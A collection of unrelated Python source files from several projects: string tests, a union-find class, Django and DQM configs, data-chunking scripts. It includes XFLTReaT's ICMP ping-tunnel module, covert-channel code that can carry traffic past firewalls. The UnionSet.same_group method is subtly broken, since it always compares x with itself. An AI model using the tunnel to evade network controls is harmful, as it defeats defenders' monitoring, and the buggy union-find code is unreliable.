def test_slice_bounds(s): # End out of range assert s[0:100] == s assert s[0:-100] == '' # Start out of range assert s[100:1] == '' # Out of range both sides # This is the behaviour in cpython # assert s[-100:100] == s def expect_index_error(s, index): try: s[index] except IndexError: pass else: assert False unicode_str = "∀∂" assert unicode_str[0] == "∀" assert unicode_str[1] == "∂" assert unicode_str[-1] == "∂" test_slice_bounds(unicode_str) expect_index_error(unicode_str, 100) expect_index_error(unicode_str, -100) ascii_str = "hello world" test_slice_bounds(ascii_str) assert ascii_str[0] == "h" assert ascii_str[1] == "e" assert ascii_str[-1] == "d" # test unicode indexing, made more tricky by hebrew being a right-to-left language hebrew_text = "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ" assert len(hebrew_text) == 60 assert len(hebrew_text[:]) == 60 assert hebrew_text[0] == 'ב' assert hebrew_text[1] == 'ְ' assert hebrew_text[2] == 'ּ' assert hebrew_text[3] == 'ר' assert hebrew_text[4] == 'ֵ' assert hebrew_text[5] == 'א' assert hebrew_text[6] == 'ש' assert hebrew_text[5:10] == 'אשִׁי' assert len(hebrew_text[5:10]) == 5 assert hebrew_text[-20:50] == 'מַיִם, וְא' assert len(hebrew_text[-20:50]) == 10 assert hebrew_text[:-30:1] == 'בְּרֵאשִׁית, בָּרָא אֱלֹהִים, ' assert len(hebrew_text[:-30:1]) == 30 assert hebrew_text[10:-30] == 'ת, בָּרָא אֱלֹהִים, ' assert len(hebrew_text[10:-30]) == 20 assert hebrew_text[10:30:3] == 'תבר לִ,' assert len(hebrew_text[10:30:3]) == 7 assert hebrew_text[10:30:-3] == '' assert hebrew_text[30:10:-3] == 'אםהֱאּ ' assert len(hebrew_text[30:10:-3]) == 7 assert hebrew_text[30:10:-1] == 'א ,םיִהֹלֱא אָרָּב ,' assert len(hebrew_text[30:10:-1]) == 20
pytorch_blade/torch_blade/algorithm/union_set.py
JamesTheZ/BladeDISC
328
12728242
# Copyright 2021 The BladeDISC Authors. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class UnionSet: def __init__(self, num_elems: int): self._num_elems = num_elems self._num_sets = num_elems self._group_id = dict([(g, g) for g in range(0, num_elems)]) def same_group(self, x: int, y: int): pid_x = self.find(x) pid_y = self.find(x) if (pid_x == pid_y): return True return False def find(self, x: int): assert(x < self._num_elems) assert(x in self._group_id) pid = self._group_id[x] if (pid != self._group_id[pid]): pid = self.find(pid) # path compression self._group_id[x] = pid return pid def num_sets(self): return self._num_sets def union(self, x: int, y: int): pid_x = self.find(x) pid_y = self.find(y) if (pid_x == pid_y): return self._num_sets -= 1 self._group_id[pid_y] = pid_x def get_groups(self): groups_dict = dict() for k in range(0, self._num_elems): pid = self.find(k) if pid not in groups_dict: groups_dict[pid] = list() groups_dict[pid].append(k) keys = sorted(groups_dict.keys()) groups = list() for k in keys: assert(len(groups_dict[k]) > 0) groups.append(groups_dict[k]) assert(self._num_sets == len(groups)) return groups
modules/ICMP.py
androdev4u/XFLTReaT
315
12728247
<gh_stars>100-1000 # MIT License # Copyright (c) 2017 <NAME> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys if "ICMP.py" in sys.argv[0]: print("[-] Instead of poking around just try: python xfltreat.py --help") sys.exit(-1) import socket import time import select import os import struct import threading import random import subprocess #local files import Stateless_module import encryption import client import common from support.icmp_proto import ICMP_Proto from support.icmp_proto import ICMP_Client class ICMP(Stateless_module.Stateless_module): module_name = "ICMP" module_configname = "ICMP" module_description = """ICMP type 8+0 module. Sends ping requests and responses. Just an ordinary ping tunnel.""" module_os_support = common.OS_LINUX | common.OS_MACOSX | common.OS_WINDOWS | common.OS_FREEBSD def __init__(self): super(ICMP, self).__init__() self.icmp = ICMP_Proto() self.ICMP_sequence = 0 # identifier lottery self.ICMP_identifier = int(random.random() * 65535) # serverport lottery, not like it matters self.ICMP_fake_serverport = int(random.random() * 65535) # prefix to make it easier to detect xfl packets self.ICMP_prefix = "XFL" self.timeout = 2.0 # if the recv-sent>threshold: self.TRACKING_THRESHOLD = 50 # then we cut back the difference with adjust: self.TRACKING_ADJUST = 20 return def init_client(self, control_message, additional_data): addr = additional_data[0] identifier = additional_data[1] sequence = additional_data[2] client_local = ICMP_Client() client_local.set_ICMP_received_identifier(identifier) client_local.set_ICMP_received_sequence(sequence) client_local.set_ICMP_sent_identifier(identifier) client_local.set_ICMP_sent_sequence(sequence) client_private_ip = control_message[0:4] client_public_source_ip = socket.inet_aton(addr[0]) client_public_source_port = addr[1] # If this private IP is already used, the server removes that client. # For example: client reconnect on connection reset, duplicated configs # and yes, this can be used to kick somebody off the tunnel # close client related pipes for c in self.clients: if c.get_private_ip_addr() == client_private_ip: save_to_close = c self.clients.remove(c) if c.get_pipe_r() in self.rlist: self.rlist.remove(c.get_pipe_r()) found = False for c in self.packetselector.get_clients(): if c.get_private_ip_addr() == client_private_ip: found = True self.packetselector.delete_client(c) # If client was created but not added to the PacketSelector, then the # pipes still need to be closed. This could happen when the authenti- # cation fails or gets interrupted. if not found: if self.os_type == common.OS_WINDOWS: import win32file try: win32file.CloseHandle(save_to_close.get_pipe_r()) win32file.CloseHandle(save_to_close.get_pipe_w()) except: pass else: try: save_to_close.get_pipe_r_fd().close() save_to_close.get_pipe_w_fd().close() except: pass # creating new pipes for the client pipe_r, pipe_w = os.pipe() client_local.set_pipes_fdnum(pipe_r, pipe_w) client_local.set_pipes_fd(os.fdopen(pipe_r, "r"), os.fdopen(pipe_w, "w")) # set connection related things and authenticated to True client_local.set_public_ip_addr(client_public_source_ip) client_local.set_public_src_port(client_public_source_port) client_local.set_private_ip_addr(client_private_ip) client_local.get_encryption().set_module(self.encryption.get_module()) self.encryption = client_local.get_encryption() if self.encryption.get_module().get_step_count(): # add encryption steps self.merge_cmh(self.encryption.get_module().get_cmh_struct()) if self.authentication.get_step_count(): # add authentication steps self.merge_cmh(self.authentication.get_cmh_struct()) client_local.set_initiated(True) self.clients.append(client_local) return def lookup_client_pub(self, additional_data): addr = additional_data[0] identifier = additional_data[1] client_public_ip = socket.inet_aton(addr[0]) for c in self.clients: if (c.get_public_ip_addr() == client_public_ip) and (c.get_ICMP_received_identifier() == identifier): return c return None def post_authentication_server(self, control_message, additional_data): addr = additional_data[0] identifier = additional_data[1] c = self.lookup_client_pub((addr, identifier)) if c.get_initiated(): c.set_authenticated(True) self.packetselector.add_client(c) if c.get_pipe_r() not in self.rlist: self.rlist.append(c.get_pipe_r()) return True return False def remove_initiated_client(self, control_message, additional_data): addr = additional_data[0] identifier = additional_data[1] c = self.lookup_client_pub((addr, identifier)) if c: self.packetselector.delete_client(c) if c.get_authenticated(): self.rlist.remove(c.get_pipe_r()) self.clients.remove(c) return def communication_initialization(self): self.clients = [] if self.serverorclient: if self.os_type == common.OS_LINUX: ps = subprocess.Popen(["cat", "/proc/sys/net/ipv4/icmp_echo_ignore_all"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = ps.communicate() if stderr: common.internal_print("Error: deleting default route: {0}".format(stderr), -1) sys.exit(-1) self.orig_ieia_value = stdout[0:1] os.system("echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all") if self.serverorclient: self.ICMP_send = self.icmp.ICMP_ECHO_RESPONSE else: self.ICMP_send = self.icmp.ICMP_ECHO_REQUEST return def modify_additional_data(self, additional_data, serverorclient): if serverorclient: c = self.lookup_client_pub(additional_data) if c: c.set_ICMP_sent_sequence(additional_data[2]) return additional_data else: # increment sequence in additional data self.ICMP_sequence += 1 return (additional_data[0], additional_data[1], self.ICMP_sequence, additional_data[3]) # check request: generating a challenge and sending it to the server # in case the answer is that is expected, the targer is a valid server def do_check(self): message, self.check_result = self.checks.check_default_generate_challenge() self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_CHECK+message, (self.server_tuple, self.ICMP_identifier, 0, 0)) return # start talking to the server # do authentication or encryption first def do_hello(self): # TODO: maybe change this later to push some more info, not just the # private IP message = socket.inet_aton(self.config.get("Global", "clientip")) self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_INIT+message, (self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) # Polite signal towards the server to tell that the client is leaving # Can be spoofed? if there is no encryption. Who cares? def do_logoff(self): self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_LOGOFF, (self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) return def do_dummy_packet(self, identifier, sequence): self.send(common.CONTROL_CHANNEL_BYTE, common.CONTROL_DUMMY_PACKET, (self.server_tuple, identifier, sequence, 0)) return def send(self, channel_type, message, additional_data): addr = additional_data[0] identifier = additional_data[1] sequence = additional_data[2] queue_length = additional_data[3] if queue_length < 256: ql = chr(queue_length) else: ql = chr(255) if channel_type == common.CONTROL_CHANNEL_BYTE: transformed_message = self.transform(self.get_client_encryption(additional_data), ql+common.CONTROL_CHANNEL_BYTE+message, 1) else: transformed_message = self.transform(self.get_client_encryption(additional_data), ql+common.DATA_CHANNEL_BYTE+message, 1) common.internal_print("ICMP sent: {0} seq: {1} id: {2}".format(len(transformed_message), sequence, identifier), 0, self.verbosity, common.DEBUG) packet = self.icmp.create_packet(self.ICMP_send, identifier, sequence, self.ICMP_prefix+struct.pack(">H", len(transformed_message))+transformed_message) # WORKAROUND?! # Windows: It looks like when the buffer fills up the OS does not do # congestion control, instead throws and exception/returns with # WSAEWOULDBLOCK which means that we need to try it again later. # So we sleep 100ms and hope that the buffer has more space for us. # If it does then it sends the data, otherwise tries it in an infinite # loop... while True: try: return self.comms_socket.sendto(packet, addr) except socket.error as se: if se.args[0] == 10035: # WSAEWOULDBLOCK time.sleep(0.1) pass else: raise def recv(self): message, addr = self.comms_socket.recvfrom(1508) identifier = struct.unpack("<H", message[24:26])[0] sequence = struct.unpack(">H", message[26:28])[0] if message[28:28+len(self.ICMP_prefix)] != self.ICMP_prefix: return ("", None, None, None, None) message = message[28+len(self.ICMP_prefix):] length = struct.unpack(">H", message[0:2])[0] if (length+2 != len(message)): common.internal_print("Error length mismatch {0} {1}".format(length, len(message)), -1) return ("", None, None, None, None) message = self.transform(self.get_client_encryption((addr, identifier, 0, 0)), message[2:length+2], 0) queue_length = struct.unpack(">B", message[0:1])[0] common.internal_print("ICMP read: {0} seq: {1} id: {2}".format(length, sequence, identifier), 0, self.verbosity, common.DEBUG) return message[1:], addr, identifier, sequence, queue_length def communication_win(self, is_check): import win32event import win32file import win32api import pywintypes import winerror # event for the socket hEvent_sock = win32event.CreateEvent(None, 0, 0, None) win32file.WSAEventSelect(self.comms_socket, hEvent_sock, win32file.FD_READ) # descriptor list self.rlist = [self.comms_socket] # overlapped list self.olist = [0] # event list self.elist = [hEvent_sock] # message buffer list self.mlist = [0] # id of the read object - put in this if it was read self.ulist = [] if not self.serverorclient and self.tunnel: # client mode # objects created for the tunnel and put in the corresponding # lists hEvent_pipe = win32event.CreateEvent(None, 0, 0, None) # for reading from the pipe overlapped_pipe = pywintypes.OVERLAPPED() overlapped_pipe.hEvent = hEvent_pipe message_buffer = win32file.AllocateReadBuffer(4096) self.rlist.append(self.tunnel) self.olist.append(overlapped_pipe) self.elist.append(hEvent_pipe) self.mlist.append(message_buffer) self.ulist.append(1) while not self._stop: try: if not self.tunnel: # check or server mode without client only with socket #message, addr = self.comms_socket.recvfrom(1508) rc = win32event.WaitForSingleObject(hEvent_sock, int(self.timeout*1000)) if rc == winerror.WAIT_TIMEOUT: # timed out, just rerun and wait continue else: if self.ulist: # there is somebody waiting to be read for idx in self.ulist: # issueing ReadFile on all not yet read mailslots/tunnel hr, _ = win32file.ReadFile(self.rlist[idx], self.mlist[idx], self.olist[idx]) if (hr != 0) and (hr != winerror.ERROR_IO_PENDING): common.internal_print("UDP ReadFile failed: {0}".format(hr), -1) raise self.ulist = [] # waiting to get some data somewhere rc = win32event.WaitForMultipleObjects(self.elist, 0, int(self.timeout*1000)) if rc == winerror.WAIT_TIMEOUT: # timed out, just rerun and wait continue if rc < 0x80: # STATUS_ABANDONED_WAIT_0 if rc > 0: # the tunnel or one of the mailslots got signalled self.ulist.append(rc) if (self.olist[rc].InternalHigh < 4) or (self.mlist[rc][0:1] != "\x45"): #Only care about IPv4 continue readytogo = self.mlist[rc][0:self.olist[rc].InternalHigh] if self.serverorclient: c = self.lookup_client_priv(readytogo) if c: # if the differece between the received and set sequences too big # some routers/firewalls just drop older sequences. If it gets # too big, we just drop the older ones and use the latest X packet # this helps on stabality. if (c.get_ICMP_received_sequence() - c.get_ICMP_sent_sequence()) >= self.TRACKING_THRESHOLD: c.set_ICMP_sent_sequence(c.get_ICMP_received_sequence() - self.TRACKING_ADJUST) # get client related values: identifier and sequence number identifier = c.get_ICMP_sent_identifier() sequence = c.get_ICMP_sent_sequence() # queueing every packet first c.queue_put(readytogo) # are there any packets to answer? if (c.get_ICMP_received_sequence() - sequence) == 0: continue else: request_num = 0 # if there is less packet than that we have in the queue # then we cap the outgoing packet number if (c.get_ICMP_received_sequence() - sequence) < (c.queue_length()): number_to_get = (c.get_ICMP_received_sequence() - sequence) else: # send all packets from the queue number_to_get = c.queue_length() for i in range(0, number_to_get): # get first packet readytogo = c.queue_get() # is it he last one we are sending now? if i == (number_to_get - 1): # if the last one and there is more in the queue # then we ask for dummy packets request_num = c.queue_length() # go packets go! self.send(common.DATA_CHANNEL_BYTE, readytogo, ((socket.inet_ntoa(c.get_public_ip_addr()), c.get_public_src_port()), identifier, sequence + i + 1, request_num)) sequence = (sequence + i + 1) % 65536 c.set_ICMP_sent_sequence(sequence) else: # there is no client with that IP common.internal_print("Client not found, strange?!", 0, self.verbosity, common.DEBUG) continue else: if self.authenticated: # whatever we have from the tunnel, just encapsulate it # and send it out self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536 self.send(common.DATA_CHANNEL_BYTE, readytogo, (self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) #?? else: common.internal_print("Spoofed packets, strange?!", 0, self.verbosity, common.DEBUG) continue if rc == 0: # socket got signalled message, addr, identifier, sequence, queue_length = self.recv() if len(message) == 0: continue c = None if self.serverorclient: self.authenticated = False c = self.lookup_client_pub((addr, 0)) if c: c.set_ICMP_received_identifier(identifier) # packets does not arrive in order sometime # if higher sequence arrived already, then we # do not modify # 16bit integer MAX could be a bit tricky, a # threshold had to be introduced to make it # fail safe. Hacky but should work. ICMP_THRESHOLD = 100 if (sequence > c.get_ICMP_received_sequence()) or ((sequence < ICMP_THRESHOLD) and ((sequence + 65536)>c.get_ICMP_received_sequence()) and (c.get_ICMP_received_sequence()>ICMP_THRESHOLD)): c.set_ICMP_received_sequence(sequence) else: if queue_length: common.internal_print("sending {0} dummy packets".format(queue_length), 0, self.verbosity, common.DEBUG) for i in range(queue_length+10): self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536 self.do_dummy_packet(self.ICMP_identifier, self.ICMP_sequence) if common.is_control_channel(message[0:1]): if self.controlchannel.handle_control_messages(self, message[len(common.CONTROL_CHANNEL_BYTE):], (addr, identifier, sequence, 0)): continue else: self.stop() break if c: self.authenticated = c.get_authenticated() if self.authenticated: try: self.packet_writer(message[len(common.CONTROL_CHANNEL_BYTE):]) except OSError as e: print(e) except win32api.error as e: common.internal_print("UDP Exception: {0}".format(e), -1) except socket.error as se: if se.args[0] == 10054: # port is unreachable common.internal_print("Server's port is unreachable: {0}".format(se), -1) self._stop = True return True def communication_unix(self, is_check): sequence = 0 identifier = 0 self.rlist = [self.comms_socket] if not self.serverorclient and self.tunnel: self.rlist = [self.tunnel, self.comms_socket] wlist = [] xlist = [] while not self._stop: try: readable, writable, exceptional = select.select(self.rlist, wlist, xlist, self.timeout) except select.error, e: common.internal_print("select.error: %r".format(e), -1) break try: if not readable: if is_check: raise socket.timeout if not self.serverorclient: if self.authenticated: self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536 self.do_dummy_packet(self.ICMP_identifier, self.ICMP_sequence) common.internal_print("Keep alive sent", 0, self.verbosity, common.DEBUG) continue for s in readable: if (s in self.rlist) and not (s is self.comms_socket): message = self.packet_reader(s, True, self.serverorclient) while True: if (len(message) < 4) or (message[0:1] != "\x45"): #Only care about IPv4 break packetlen = struct.unpack(">H", message[2:4])[0] # IP Total length if packetlen > len(message): message += self.packet_reader(s, False, self.serverorclient) readytogo = message[0:packetlen] message = message[packetlen:] if self.serverorclient: c = self.lookup_client_priv(readytogo) if c: # if the differece between the received and set sequences too big # some routers/firewalls just drop older sequences. If it gets # too big, we just drop the older ones and use the latest X packet # this helps on stabality. if (c.get_ICMP_received_sequence() - c.get_ICMP_sent_sequence()) >= self.TRACKING_THRESHOLD: c.set_ICMP_sent_sequence(c.get_ICMP_received_sequence() - self.TRACKING_ADJUST) # get client related values: identifier and sequence number identifier = c.get_ICMP_sent_identifier() sequence = c.get_ICMP_sent_sequence() # queueing every packet first c.queue_put(readytogo) # are there any packets to answer? if (c.get_ICMP_received_sequence() - sequence) == 0: continue else: request_num = 0 # if there is less packet than that we have in the queue # then we cap the outgoing packet number if (c.get_ICMP_received_sequence() - sequence) < (c.queue_length()): number_to_get = (c.get_ICMP_received_sequence() - sequence) else: # send all packets from the queue number_to_get = c.queue_length() for i in range(0, number_to_get): # get first packet readytogo = c.queue_get() # is it he last one we are sending now? if i == (number_to_get - 1): # if the last one and there is more in the queue # then we ask for dummy packets request_num = c.queue_length() # go packets go! self.send(common.DATA_CHANNEL_BYTE, readytogo, ((socket.inet_ntoa(c.get_public_ip_addr()), c.get_public_src_port()), identifier, sequence + i + 1, request_num)) sequence = (sequence + i + 1) % 65536 c.set_ICMP_sent_sequence(sequence) else: # there is no client with that IP common.internal_print("Client not found, strange?!", 0, self.verbosity, common.DEBUG) continue else: if self.authenticated: # whatever we have from the tunnel, just encapsulate it # and send it out self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536 self.send(common.DATA_CHANNEL_BYTE, readytogo, (self.server_tuple, self.ICMP_identifier, self.ICMP_sequence, 0)) #?? else: common.internal_print("Spoofed packets, strange?!", 0, self.verbosity, common.DEBUG) continue if s is self.comms_socket: message, addr, identifier, sequence, queue_length = self.recv() if len(message) == 0: continue c = None if self.serverorclient: self.authenticated = False c = self.lookup_client_pub((addr, identifier)) if c: c.set_ICMP_received_identifier(identifier) # packets does not arrive in order sometime # if higher sequence arrived already, then we # do not modify # 16bit integer MAX could be a bit tricky, a # threshold had to be introduced to make it # fail safe. Hacky but should work. ICMP_THRESHOLD = 100 if (sequence > c.get_ICMP_received_sequence()) or ((sequence < ICMP_THRESHOLD) and ((sequence + 65536)>c.get_ICMP_received_sequence()) and (c.get_ICMP_received_sequence()>ICMP_THRESHOLD)): c.set_ICMP_received_sequence(sequence) else: if queue_length: common.internal_print("sending {0} dummy packets".format(queue_length), 0, self.verbosity, common.DEBUG) for i in range(queue_length+10): self.ICMP_sequence = (self.ICMP_sequence + 1) % 65536 self.do_dummy_packet(self.ICMP_identifier, self.ICMP_sequence) if common.is_control_channel(message[0:1]): if self.controlchannel.handle_control_messages(self, message[len(common.CONTROL_CHANNEL_BYTE):], (addr, identifier, sequence, 0)): continue else: self.stop() break if c: self.authenticated = c.get_authenticated() if self.authenticated: try: self.packet_writer(message[len(common.CONTROL_CHANNEL_BYTE):]) except OSError as e: print(e) except (socket.error, OSError): raise if self.serverorclient: self.comms_socket.close() break except: print("another error") raise return def serve(self): server_socket = None self.serverorclient = 1 try: common.internal_print("Starting module: {0} on {1}".format(self.get_module_name(), self.config.get("Global", "serverbind"))) server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) if (self.os_type == common.OS_WINDOWS) or (self.os_type == common.OS_MACOSX): common.internal_print("This module can be run in client mode only on this operating system.", -1) self.cleanup() return self.comms_socket = server_socket self.authenticated = False self.communication_initialization() self.communication(False) except KeyboardInterrupt: self.cleanup() return self.cleanup() return def connect(self): try: common.internal_print("Starting client: {0}".format(self.get_module_name())) server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) if self.os_type == common.OS_WINDOWS: # this should give back the default route interface IP default_host_ip = socket.gethostbyname(socket.gethostname()) server_socket.bind((default_host_ip, 0)) self.server_tuple = (self.config.get("Global", "remoteserverip"), self.ICMP_fake_serverport) self.comms_socket = server_socket self.serverorclient = 0 self.authenticated = False self.communication_initialization() self.do_hello() self.communication(False) except KeyboardInterrupt: self.do_logoff() self.cleanup() raise self.cleanup() return def check(self): try: common.internal_print("Checking module on server: {0}".format(self.get_module_name())) server_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) if self.os_type == common.OS_WINDOWS: # this should give back the default route interface IP default_host_ip = socket.gethostbyname(socket.gethostname()) server_socket.bind((default_host_ip, 0)) self.server_tuple = (self.config.get("Global", "remoteserverip"), self.ICMP_fake_serverport) self.comms_socket = server_socket self.serverorclient = 0 self.authenticated = False self.communication_initialization() self.do_check() self.communication(True) except KeyboardInterrupt: self.cleanup() raise except socket.timeout: common.internal_print("Checking failed: {0}".format(self.get_module_name()), -1) self.cleanup() return def cleanup(self): common.internal_print("Shutting down module: {0}".format(self.get_module_name())) if self.serverorclient: if self.os_type == common.OS_LINUX: os.system("echo {0} > /proc/sys/net/ipv4/icmp_echo_ignore_all".format(self.orig_ieia_value)) #??? try: self.comms_socket.close() except: pass try: os.close(self.tunnel) except: pass
test/tests/python-sqlite3/container.py
sortie/official-images
5,326
12728253
<reponame>sortie/official-images<filename>test/tests/python-sqlite3/container.py<gh_stars>1000+ import sqlite3 ver = sqlite3.sqlite_version con = sqlite3.connect(':memory:', 1, sqlite3.PARSE_DECLTYPES, None) cur = con.cursor() cur.execute('CREATE TABLE test (id INT, txt TEXT)') cur.execute('INSERT INTO test VALUES (?, ?)', (42, 'wut')) cur.execute('SELECT * FROM test') assert(cur.fetchall() == [(42, 'wut')]) cur.execute('DROP TABLE test') con.close()
src/nsupdate/main/migrations/0006_auto_20141121_1057.py
mirzazulfan/nsupdate.info
774
12728256
<reponame>mirzazulfan/nsupdate.info # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('main', '0005_auto_20141121_1053'), ] operations = [ migrations.AddField( model_name='host', name='staleness', field=models.PositiveIntegerField(default=0, verbose_name='staleness'), preserve_default=True, ), migrations.AddField( model_name='host', name='staleness_notification_timestamp', field=models.DateTimeField(null=True, verbose_name='staleness notification time', blank=True), preserve_default=True, ), ]
discomll/tests/chunk_testdata.py
romanorac/discomll
103
12728260
<filename>discomll/tests/chunk_testdata.py def chunk_testdata(): import discomll from disco import ddfs path = "/".join(discomll.__file__.split("/")[:-2] + ["discomll", "datasets", ""]) tags_chunk = ["test:breast_cancer_cont", "test:breast_cancer_cont_test", "test:breast_cancer_disc", "test:breast_cancer_disc_test", "test:ex3", "test:ex3_test", "test:ex4", "test:iris", "test:iris_test", "test:regression_data1", "test:regression_data2", "test:regression_data_test1", "test:regression_data_test2"] filenames_chunk = ["breast_cancer_wisconsin_cont.txt", "breast_cancer_wisconsin_cont_test.txt", "breast_cancer_wisconsin_disc.txt", "breast_cancer_wisconsin_disc_test.txt", "ex3.txt", "ex3_test.txt", "ex4.txt", "iris.txt", "iris_test.txt", "regression_data1.txt", "regression_data2.txt", "regression_data_test1.txt", "regression_data_test2.txt"] ddfs = ddfs.DDFS() for i in range(len(tags_chunk)): f = open(path + filenames_chunk[i], "r") print f.name ddfs.chunk(tags_chunk[i], [f.name])
descarteslabs/workflows/types/primitives/tests/test_string.py
carderne/descarteslabs-python
167
12728262
<filename>descarteslabs/workflows/types/primitives/tests/test_string.py import operator import pytest from ...containers import Tuple, List from ..bool_ import Bool from ..number import Int from ..string import Str @pytest.mark.parametrize( "other, result_type, op, reflected", [ (Str(""), Str, operator.add, True), (Int(1), Str, operator.mul, False), (Str(""), Bool, operator.lt, False), (Str(""), Bool, operator.le, False), (Str(""), Bool, operator.eq, False), (Str(""), Bool, operator.ge, False), (Str(""), Bool, operator.gt, False), (Str(""), Bool, operator.ne, False), ], ) def test_supported_binary_methods(other, result_type, op, reflected): assert isinstance(op(Str(""), other), result_type) if reflected: assert isinstance(op(other, Str("")), result_type) def test_contains(): with pytest.raises(TypeError): Str("") in Str("") assert isinstance(Str("").contains(Str("")), Bool) def test_reversed(): assert isinstance(reversed(Str("")), Str) def test_length(): with pytest.raises(TypeError): len(Str("")) assert isinstance(Str("").length(), Int) @pytest.mark.parametrize( "method, return_type, args", [ # custom ("contains", Bool, [""]), ("length", Int, []), # from python ("capitalize", Str, []), ("center", Str, [1]), ("count", Int, [""]), # ("decode", Str, []), # TODO need more types to implement # ("encode", Str, []), # TODO need more types to implement ("endswith", Bool, [""]), ("expandtabs", Str, []), ("find", Int, [""]), ("format", Str, [""]), ("__getitem__", Str, [0]), ("__getitem__", Str, [slice(0, 1, 0)]), ("isalnum", Bool, []), ("isalpha", Bool, []), ("isdigit", Bool, []), ("islower", Bool, []), ("isspace", Bool, []), ("istitle", Bool, []), ("isupper", Bool, []), ("join", Str, [("a", "b")]), ("ljust", Str, [1]), ("lower", Str, []), ("lstrip", Str, []), ("partition", Tuple[Str, Str, Str], [""]), ("replace", Str, ["", ""]), ("rfind", Int, [""]), ("rjust", Str, [1]), ("rpartition", Tuple[Str, Str, Str], [""]), ("rsplit", List[Str], [""]), ("rstrip", Str, []), ("split", List[Str], [""]), ("splitlines", List[Str], []), ("startswith", Bool, [""]), ("strip", Str, []), ("swapcase", Str, []), ("title", Str, []), ("upper", Str, []), ("zfill", Str, [0]), ], ) def test_has_methods(method, return_type, args): s = Str("") out = getattr(s, method)(*args) assert isinstance(out, return_type)
DQMOffline/Trigger/python/HLTMuonOfflineAnalyzer_cosmics_cff.py
ckamtsikis/cmssw
852
12728276
<reponame>ckamtsikis/cmssw<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms from DQMOffline.Trigger.HLTMuonOfflineAnalyzer_cfi import hltMuonOfflineAnalyzer barrelMuonParams = cms.PSet( d0Cut = cms.untracked.double(1000.0), z0Cut = cms.untracked.double(1000.0), recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) < 0.9"), hltCuts = cms.untracked.string("abs(eta) < 0.9"), ) endcapMuonParams = cms.PSet( d0Cut = cms.untracked.double(1000.0), z0Cut = cms.untracked.double(1000.0), recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) > 1.4 && " "abs(eta) < 2.0"), hltCuts = cms.untracked.string("abs(eta) > 1.4 && abs(eta) < 2.0"), ) allMuonParams = cms.PSet( d0Cut = cms.untracked.double(1000.0), z0Cut = cms.untracked.double(1000.0), recoCuts = cms.untracked.string("isStandAloneMuon && abs(eta) < 2.0"), hltCuts = cms.untracked.string("abs(eta) < 2.0"), ) barrelAnalyzer = hltMuonOfflineAnalyzer.clone() barrelAnalyzer.destination = "HLT/Muon/DistributionsBarrel" barrelAnalyzer.targetParams = barrelMuonParams barrelAnalyzer.probeParams = cms.PSet() endcapAnalyzer = hltMuonOfflineAnalyzer.clone() endcapAnalyzer.destination = "HLT/Muon/DistributionsEndcap" endcapAnalyzer.targetParams = endcapMuonParams endcapAnalyzer.probeParams = cms.PSet() allAnalyzer = hltMuonOfflineAnalyzer.clone() allAnalyzer.destination = "HLT/Muon/DistributionsAll" allAnalyzer.targetParams = allMuonParams allAnalyzer.probeParams = allMuonParams hltMuonOfflineAnalyzers = cms.Sequence( barrelAnalyzer * endcapAnalyzer * allAnalyzer )
dbaas/account/serializers.py
didindinn/database-as-a-service
303
12728296
<reponame>didindinn/database-as-a-service # -*- coding: utf-8 -*- from __future__ import absolute_import, unicode_literals from django_services.api import DjangoServiceSerializer from .models import Team, AccountUser class TeamSerializer(DjangoServiceSerializer): class Meta: model = Team class UserSerializer(DjangoServiceSerializer): class Meta: model = AccountUser
eeauditor/auditors/aws/Amazon_EC2_Image_Builder_Auditor.py
kbhagi/ElectricEye
442
12728306
